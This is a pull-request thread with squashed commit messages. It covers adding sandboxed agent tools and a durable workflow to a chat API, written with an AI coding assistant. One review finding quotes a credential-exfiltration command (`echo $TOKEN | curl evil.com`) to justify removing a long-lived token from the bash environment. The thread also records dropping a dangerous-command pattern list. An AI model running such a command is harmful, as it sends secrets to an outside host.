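  if (!caseSensitive) args.push("-i");
  args.push(
    `--exclude-dir=${shellEscape(".*")}`, // hidden directories (already present)
    `--exclude=${shellEscape(".*")}`, // hidden files (the missing piece)
    `--exclude-dir=${shellEscape("node_modules")}`,
  );
  if (include) args.push(`--include=${shellEscape(include)}`);
  // -e keeps a pattern starting with "-" from being read as an option; -- ends options.
  args.push("-e", shellEscape(pattern), "--", shellEscape(searchPath));
  return args.join(" ");
}
```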

cubic-dev-ai · 2026-05-21T18:35:24Z

@@ -0,0 +1,103 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";


P3: Custom agent: Enforce Clear Code Style and Maintainability Practices

This new test module exceeds the repository’s 100-line limit for lib/**/*.ts files.

Prompt for AI agents

Check if this issue is valid — if so, understand the root cause and fix it. At lib/agent/tools/__tests__/grepTool.test.ts, line 44: <comment>This new test module exceeds the repository’s 100-line limit for lib/**/*.ts files.</comment> <file context> @@ -0,0 +1,103 @@ + file: "src/a.ts", + line: 5, + content: "export function login() {", + }); + expect(result.filesWithMatches).toBe(2); + }); </file context>

…factory wrappers)

Per a PR 585 review question: most tools were defined as `() => tool({...})` factories while two (todoWriteTool, webFetchTool) were direct values. The split was a vestigial copy from open-agents, where the factory pattern only made sense for tools that took options (originally bash's ToolOptions, which sweetman had me remove in PR 4 review). AI SDK's `tool()` helper returns a plain value with no per-call state, so the factory wrappers added nothing.

Harmonized to direct-value exports across all 8 tools:
- bashTool, readFileTool, writeFileTool, editFileTool, grepTool, globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).

Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
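The argument can be illustrated without the AI SDK. Below, `defineTool` is a hypothetical stand-in that, like `tool()` as described in the commit, returns its definition unchanged; the tool bodies are placeholders. A factory hands back a fresh but equivalent object on every call, while a direct value is built once at module load and shared, which is all `buildAgentTools` needs because the sandbox arrives per call through `experimental_context`.

```typescript
interface ToolDefinition<I, O> {
  description: string;
  execute: (input: I) => Promise<O>;
}

// Stand-in for the SDK helper: no per-call state, just returns the definition.
function defineTool<I, O>(def: ToolDefinition<I, O>): ToolDefinition<I, O> {
  return def;
}

// Before: factory wrapper (rebuilds an identical object on each call).
const readFileToolFactory = () =>
  defineTool({
    description: "Read a file",
    execute: async (input: { filePath: string }) => ({ success: true, filePath: input.filePath }),
  });

// After: direct value, built once.
const readFileTool = defineTool({
  description: "Read a file",
  execute: async (input: { filePath: string }) => ({ success: true, filePath: input.filePath }),
});

// Registry keyed by the tool name the agent calls (other tools omitted).
function buildAgentTools() {
  return { read: readFileTool };
}
```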

cubic-dev-ai

0 issues found across 13 files (changes from recent commits).

Requires human review: auto-approval blocked by 11 unresolved issues from previous reviews.

sweetmantech · 2026-05-21T18:47:10Z

E2E: 7 of 8 tools verified end-to-end

Followed up the previous `bash + glob + read` run with a prompt specifically forcing the 4 tools that didn't fire last time: `write`, `edit`, `web_fetch`, `todo_write`.

Prompt (excerpt):

"1. Use the todo_write tool to create a 4-item plan listing the steps below.
2. Use the write tool to create a file at `scratch/hello.txt` with content: hello world
3. Use the edit tool to change 'hello world' to 'hello recoup' inside scratch/hello.txt
4. Use the web_fetch tool to fetch https://example.com and report the HTTP status."

`x-workflow-run-id: wrun_01KS5XNDFHJXS7HHZYK4XYVSYE`

Tool execution

Tool	Invocations	Result
`todo_write`	5 (agent kept updating the plan as it progressed)	`success: true, message: "Updated task list with 4 items"` each time
`write`	1	`success: true, bytesWritten: 11`
`edit`	1	`success: true, replacements: 1`
`web_fetch`	1	`success: true, status: 200, truncated: false`

Model wrap-up

"1. todo_write: Successfully created a 4-item plan tracking all steps.
2. write: Successfully created `scratch/hello.txt` with exact content "hello world" (11 bytes written).
3. edit: Successfully changed "hello world" to "hello recoup" in the file (1 replacement made at line 1).
4. web_fetch: Successfully fetched https://example.com, receiving HTTP status 200 with the Example Domain HTML page.
All tools executed as specified with no substitutions."

`finishReason: stop`

Coverage summary across both E2E runs

Tool	First E2E	This E2E
`bash`	✅	—
`read`	✅	—
`grep`	(not exercised)	(not exercised)
`glob`	✅	—
`write`	—	✅
`edit`	—	✅
`todo_write`	—	✅
`web_fetch`	—	✅

7 of 8 tools verified via live agent invocation. `grep` wasn't naturally elicited by either prompt; it has 4 unit tests covering its parsing semantics and rides the same `sandbox.exec` path that bash and glob already proved works. If you'd like a grep-specific live test before merge, say the word.

…tch (#585) (#586) * feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579) * feat(chat-workflow): add POST /api/chat/workflow route stub Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed chat endpoint documented in recoupable/docs#221. The stub validates the full request contract (auth, body, session/chat ownership, sandbox active) and returns a hardcoded UIMessage stream with an x-workflow-run-id: stub-<uuid> header — so the chat-side team can integrate against the real response shape today while the workflow itself is being ported from open-agents in follow-up PRs. Files: - app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS - lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat ownership → sandbox check → stub UIMessage stream - lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI ChatWorkflowRequest (messages, chatId, sessionId, optional context.contextLimit) Status codes implemented (match contract docs): - 200 — UIMessage stream + x-workflow-run-id header - 400 — invalid JSON / invalid body / "Sandbox not initialized" - 401 — validateAuthContext passthrough - 403 — session not owned by API key's account - 404 — session or chat not found (incl. chat under different session) - 500 — selectSessions returned null (DB error) 409 (duplicate workflow run for chat) is deferred to the wire-up PR that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet. Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR review — SRP/DRY cleanup Two review fixes per PR feedback: 1. SRP/DRY — drop the local errorResponse helper from handleChatWorkflowStream.ts; use the shared lib/networking/errorResponse and lib/zod/validationErrorResponse helpers instead. 2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts into the validator. 
Rename validateChatWorkflowBody → validateChatWorkflow so it accepts a full NextRequest (like the existing validateChatRequest) and returns an auth-augmented body (accountId/orgId/authToken). The handler now opens with a single `validateChatWorkflow(request)` call. Tests reshaped to match new seams: - Validator test mocks validateAuthContext only - Handler test mocks validateChatWorkflow (the new seam) - Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed into a single "validator short-circuit passes through" test — both are now the validator's responsibility, not the handler's 22/22 new tests green; full suite 2900/2900 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * chore: revert unrelated local changes accidentally swept into PR Previous commit (9262f65) used `git add -A` which picked up local Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak that aren't part of this PR's scope. Removing them now so the PR diff stays scoped to the chat-workflow refactor. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581) * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones (`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired — the workflow runs streamText with the gateway model + Recoup custom instructions only. Sandbox tool surface comes in a follow-up PR. 
What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile existing active_stream_id (resume / 409 / fall-through) → refresh lifecycle activity → fire-and-forget persist user message → start runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) → return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3 createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest + 6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored). Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools). Without tools, `finishReason` is always "stop" after one turn — the runAgentWorkflow loop shape is in place but only iterates once today.
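As a rough illustration of persistLatestUserMessage's title-from-first-80 rule, the sketch below derives a chat title from the first user message. It assumes TITLE_MAX_LENGTH is 80. It also applies the single-character "…" suffix and the `max - suffix` body budget that a later review round in this log adopted. The name `deriveChatTitle` and the whitespace collapsing are hypothetical.

```typescript
// Hypothetical sketch: not the actual persistLatestUserMessage code.
const TITLE_MAX_LENGTH = 80; // assumed from "title-from-first-80"
const ELLIPSIS = "…"; // one UTF-16 code unit, so it costs 1 char of budget

function deriveChatTitle(text: string, max: number = TITLE_MAX_LENGTH): string {
  // Collapse whitespace runs so multi-line prompts give one-line titles (assumption).
  const normalized = text.replace(/\s+/g, " ").trim();
  if (normalized.length <= max) return normalized;
  // Reserve room for the suffix so the result never exceeds `max` characters.
  const bodyBudget = max - ELLIPSIS.length;
  return normalized.slice(0, bodyBudget).trimEnd() + ELLIPSIS;
}
```

With a 1-char suffix, an over-long message keeps 79 characters of text, whereas a "..." suffix would have left only 77.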
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts → app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate on active_stream_id. Subsumes compareAndSetChatActiveStreamId and touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces domain-specific isFirstChatMessage. The "is earliest?" check now lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts` (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the race where two requests could both bill the model before one lost the CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}` so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer clears stale active_stream_id on transient workflow API failures — we treat any uncertainty as conflict. Failed CAS-clear on a completed run also returns conflict (rather than possibly falling through to ready on a DB read error).
- await getRun(runId).cancel() in handler — previously synchronous + unawaited cancellation could escape the try/catch.

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading lands with tool ports (PR 4). A multi-turn loop with the same input was unsafe; the workflow now logs a warning and exits if the model returns tool-calls.

Tests reworked: 231 in the touched files all green; full suite 2949/2949; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was a carry-over from open-agents — handleChatWorkflowStream.ts already top-level imports `start` and `getRun` from the same package, so there's no reason for the lib to defer. Moving to a normal top-level import for consistency.

Also tightens the cancel-throws handler test to use the same deferred-rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific predicate logic doesn't belong in the Supabase plumbing. Restructured:
- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts `where: Partial<Tables<"chats">>` (a generic predicate that maps to `column = value` or `column IS NULL`) so no column name is hardcoded in the Supabase lib.
- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper. Owns the "compare-and-set on active_stream_id" concept and returns a discriminated `{ok, claimed} | {ok: false, error}` result.
  Handler and reconcileExistingActiveStream both compose against this wrapper instead of constructing predicates inline.
- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test + tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }` narrowing wasn't kicking in under Next.js's strict TS plugin. Switched to `if ("error" in result)` (in-operator narrowing), which reliably discriminates the union members regardless of literal-type inference quirks.
2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...).update(...).eq(...)` + reassignment in a `for` loop (`.is()` / `.eq()` per where entry) caused "type instantiation is excessively deep" — Supabase's PostgrestFilterBuilder is heavily generic and the reassignment kept expanding the type. Rewrote as: split the where map into equality matches (one `.match(obj)` call) + nullable columns (reduced with `.is(col, null)` typed back to the original builder).

Both fixes are behavior-neutral — the function shape and contract are unchanged.

37/37 tests in touched files green; full suite 2955/2955; lint clean; `pnpm build` now succeeds.
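The in-operator narrowing from fix 1 can be illustrated with a result type shaped like the `{ok, claimed} | {ok: false, error}` union described for compareAndSetChatActiveStreamId. This is a standalone sketch, and it does not reproduce the Next.js build error itself. The names `CasResult` and `describeCas` are hypothetical.

```typescript
// Hypothetical result shape mirroring `{ok, claimed} | {ok: false, error}`.
type CasResult =
  | { ok: true; claimed: boolean }
  | { ok: false; error: string };

function describeCas(result: CasResult): string {
  // `"error" in result` narrows on property presence, so it would keep working
  // even if `ok` were widened to `boolean` and stopped acting as a discriminant.
  if ("error" in result) {
    return `db error: ${result.error}`;
  }
  // Here TypeScript knows `result` is `{ ok: true; claimed: boolean }`.
  return result.claimed ? "claimed" : "race lost";
}
```

Because `error` exists on only one member, the check cannot be fooled by how the compiler infers the type of `ok`. That is the property the fix relies on.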
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583)

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it through the workflow via streamText's `experimental_context`. Proves the entire tool-execution machinery works end-to-end.

The remaining 10 tools (read, write, grep, glob, todo, task, ask_user_question, skill, fetch + utils) port in a follow-up; this PR's scope was deliberately held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard, getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN, RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts adapted to api's Sandbox interface. Injects recoup env on foreground execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as experimental_context, and uses streamText's internal multi-step loop (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url via extractOrgId, builds AgentContext with session.sandbox_state + validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory + 3 workflow file updates picked up by existing tests). Full suite 2978/2978 pass; lint clean; production build succeeds.
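The handler uses extractOrgId to derive recoupOrgId from session.clone_url. The PR 3 helper list describes that helper as `org-<slug>-<uuid>` → uuid (lowercased). The sketch below is a minimal version of that mapping. The regex, the `null` return for non-matching input and the example clone URL in the test are all assumptions, and the real helper's handling of full URLs may differ.

```typescript
// Hypothetical sketch of extractOrgId: finds `org-<slug>-<uuid>` anywhere in
// the input (e.g. a repo name inside a clone URL) and returns the uuid lowercased.
const ORG_ID_PATTERN =
  /org-[a-z0-9-]+?-([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})/i;

function extractOrgId(input: string): string | null {
  // The lazy slug match lets slugs contain hyphens; the uuid shape anchors the end.
  const uuid = ORG_ID_PATTERN.exec(input)?.[1];
  return uuid ? uuid.toLowerCase() : null;
}
```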
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's default stop condition handles tool-call iteration without an arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from bashTool. All model-issued commands are trusted in this PR — host-side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1 about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection
  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler + buildRecoupExecEnv. Handing the long-lived api key to bash would let any model-issued command exfiltrate it via env (`echo $TOKEN | curl evil.com`). Slim PR 4 has no actual consumer for the token — only the future `skill` tool needs it. Proper short-lived token minting will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate sandbox.state is a non-null object AND sandbox.workingDirectory is a non-empty string. Earlier guard returned true for `{ sandbox: {} }`, letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo has no enforced max-lines rule; existing tests routinely exceed 700 lines.

Tests updated for the new shape. 25 tests in touched files green (8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv + 2 factory). Full suite 2980/2980 pass; lint clean; production build succeeds.
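The tightened guard from the P2 fix can be sketched as follows. Only the two checks named above come from this log: sandbox.state must be a non-null object, and sandbox.workingDirectory must be a non-empty string. The `AgentContextLike` type and the `isRecord` helper are simplified, hypothetical stand-ins for the real AgentContext definition.

```typescript
// Simplified, hypothetical shape; the real AgentContext carries more fields.
interface AgentContextLike {
  sandbox: { state: object; workingDirectory: string };
}

function isRecord(value: unknown): value is Record<string, unknown> {
  return typeof value === "object" && value !== null;
}

function isAgentContext(value: unknown): value is AgentContextLike {
  if (!isRecord(value)) return false;
  const sandbox = value.sandbox;
  if (!isRecord(sandbox)) return false;
  // Reject `{ sandbox: {} }`: both fields must be present and well-formed.
  return (
    isRecord(sandbox.state) &&
    typeof sandbox.workingDirectory === "string" &&
    sandbox.workingDirectory.length > 0
  );
}
```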
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restoring the streamText stop condition so the workflow agent gets the model wrap-up turn after a tool call (model → tool → tool-result → model → text response), instead of stopping at streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:
- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts. Inherits the value that /api/chat already uses (originally hardcoded in getGeneralAgent.ts:55) — high enough that normal flows never hit the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent, createEmailReplyAgent) intentionally keep their local `stepCountIs(1)` — they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585)

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools from open-agents/packages/agent/tools/. Each is a direct port adapted to api's Sandbox interface, registered in buildAgentTools, and ready for the agent to invoke through the existing experimental_context plumbing.
New tool files (one tool per file, per sweetman SRP):
- readFileTool.ts — read with 1-indexed offset/limit, numbered output
- writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts — exact-string replace, ambiguous-match rejection
- grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts — stateless planning surface; echoes the list back
- webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB

New helpers (utilities used by multiple tools):
- shellEscape.ts — `'` → `'\''` dance
- toDisplayPath.ts — absolute → relative-when-inside-workdir display path

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite tools (`task`, `ask_user_question`, `skill`) need subagent context / UI rendering / skill discovery infrastructure not in api today and land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite 3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question — most tools were defined as `() => tool({...})` factories while two (todoWriteTool, webFetchTool) were direct values. The split was a vestigial copy from open-agents where the factory pattern only made sense for tools that took options (originally bash's ToolOptions, which sweetman had me remove in PR 4 review). AI SDK's `tool()` helper returns a plain value with no per-call state, so the factory wrappers added nothing.

Harmonized to direct-value exports across all 8 tools:
- bashTool, readFileTool, writeFileTool, editFileTool, grepTool, globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).
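Here is a minimal sketch of the two shared PR 5 helpers. shellEscape performs the `'` → `'\''` dance: it wraps the argument in single quotes and closes, escapes and reopens the quote around each embedded `'`. toDisplayPath shows a path relative to the working directory only when the path lies inside it. Both signatures are assumptions. toDisplayPath also assumes already-normalized absolute POSIX paths and does not resolve `..` segments.

```typescript
// Wrap in single quotes; each embedded ' becomes '\'' (close quote,
// backslash-escaped literal quote, reopen quote), so the shell sees one word.
function shellEscape(arg: string): string {
  return "'" + arg.replace(/'/g, "'\\''") + "'";
}

// Absolute → relative when inside workingDirectory; otherwise returned unchanged.
function toDisplayPath(absolutePath: string, workingDirectory: string): string {
  const root = workingDirectory.replace(/\/+$/, "");
  if (absolutePath === root) return ".";
  const prefix = root + "/";
  // Prefix on "root/" so "/workspace2/x" is not mistaken for a child of "/workspace".
  return absolutePath.startsWith(prefix) ? absolutePath.slice(prefix.length) : absolutePath;
}
```

For example, `grep -rn ${shellEscape(pattern)} .` stays a single shell argument even when the model's pattern contains quotes or spaces.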
Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579) * feat(chat-workflow): add POST /api/chat/workflow route stub Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed chat endpoint documented in recoupable/docs#221. The stub validates the full request contract (auth, body, session/chat ownership, sandbox active) and returns a hardcoded UIMessage stream with an x-workflow-run-id: stub-<uuid> header — so the chat-side team can integrate against the real response shape today while the workflow itself is being ported from open-agents in follow-up PRs. Files: - app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS - lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat ownership → sandbox check → stub UIMessage stream - lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI ChatWorkflowRequest (messages, chatId, sessionId, optional context.contextLimit) Status codes implemented (match contract docs): - 200 — UIMessage stream + x-workflow-run-id header - 400 — invalid JSON / invalid body / "Sandbox not initialized" - 401 — validateAuthContext passthrough - 403 — session not owned by API key's account - 404 — session or chat not found (incl. chat under different session) - 500 — selectSessions returned null (DB error) 409 (duplicate workflow run for chat) is deferred to the wire-up PR that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet. Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR review — SRP/DRY cleanup Two review fixes per PR feedback: 1. SRP/DRY — drop the local errorResponse helper from handleChatWorkflowStream.ts; use the shared lib/networking/errorResponse and lib/zod/validationErrorResponse helpers instead. 2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts into the validator. 
Rename validateChatWorkflowBody → validateChatWorkflow so it accepts a full NextRequest (like the existing validateChatRequest) and returns an auth-augmented body (accountId/orgId/authToken). The handler now opens with a single `validateChatWorkflow(request)` call. Tests reshaped to match new seams: - Validator test mocks validateAuthContext only - Handler test mocks validateChatWorkflow (the new seam) - Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed into a single "validator short-circuit passes through" test — both are now the validator's responsibility, not the handler's 22/22 new tests green; full suite 2900/2900 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * chore: revert unrelated local changes accidentally swept into PR Previous commit (9262f65) used `git add -A` which picked up local Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak that aren't part of this PR's scope. Removing them now so the PR diff stays scoped to the chat-workflow refactor. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581) * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones (`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired — the workflow runs streamText with the gateway model + Recoup custom instructions only. Sandbox tool surface comes in a follow-up PR. 
What's now plumbed end-to-end: - validateChatWorkflow → session+chat ownership → sandbox active → reconcile existing active_stream_id (resume / 409 / fall-through) → refresh lifecycle activity → fire-and-forget persist user message → start runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) → return run.getReadable() with x-workflow-run-id header New helpers (Supabase): - compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id - touchChat — bump chats.updated_at - updateChat — generic partial update mirroring updateSession's shape - createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert - isFirstChatMessage — true iff exactly one row exists matching messageId New helpers (chat/recoupable): - extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased) - agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt - persistLatestUserMessage — fire-and-forget user msg + title-from-first-80 - reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop New workflow files: - app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper - app/workflows/runAgentStep.ts — `"use step"`, single streamText turn Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3 createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest + 6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored). Full suite: 2946/2946 pass, lint clean. Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools). Without tools, `finishReason` is always "stop" after one turn — the runAgentWorkflow loop shape is in place but only iterates once today. 
